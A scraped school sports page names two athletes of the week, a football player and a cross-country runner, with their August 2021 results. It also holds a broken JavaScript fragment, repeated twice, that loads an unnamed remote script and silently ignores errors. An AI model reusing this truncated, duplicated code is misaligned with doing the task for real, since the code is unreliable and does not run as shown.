Athletes of the Week

Kemba Credit Union Athletes of the Week 8/23/2021-8/29/2021

Cameron Goode
Senior, Football

Cam lead the football team to victory over West Clermont with 45 yards receiving, 108 yards rushing and 3 touchdowns.

 

 

 

 

 

 

Evelyn Prodoehl
Freshman, Cross Country

Evelyn made her high school cross-country debut this past weekend by winning the Girls Varsity Race at the East Classic.  Evelyn finished over 1 minute ahead of her nearest competitor in a field of 111 runners, with a time of 18:50.9.

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts